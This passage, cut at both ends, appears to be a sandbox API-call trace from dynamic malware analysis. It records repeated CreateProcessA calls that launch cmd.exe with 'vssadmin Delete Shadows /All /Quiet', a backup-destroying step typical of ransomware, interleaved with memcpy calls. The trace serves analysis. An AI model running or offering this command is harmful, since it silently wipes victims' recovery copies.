lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.363] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.363] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.363] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.363] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.363] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.363] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.363] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.364] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.364] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.364] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.364] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.364] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.364] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.364] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.364] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.364] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.364] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.364] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.365] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.365] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.365] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.365] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.365] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.365] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.365] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.365] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.365] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.365] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.365] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.365] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.366] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.366] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.366] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.366] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.366] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.366] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.366] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.366] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.366] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.366] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.366] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.366] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.367] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.367] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.367] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.367] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.367] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.367] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.367] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.367] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.367] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.367] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.367] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.367] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.368] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.368] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c 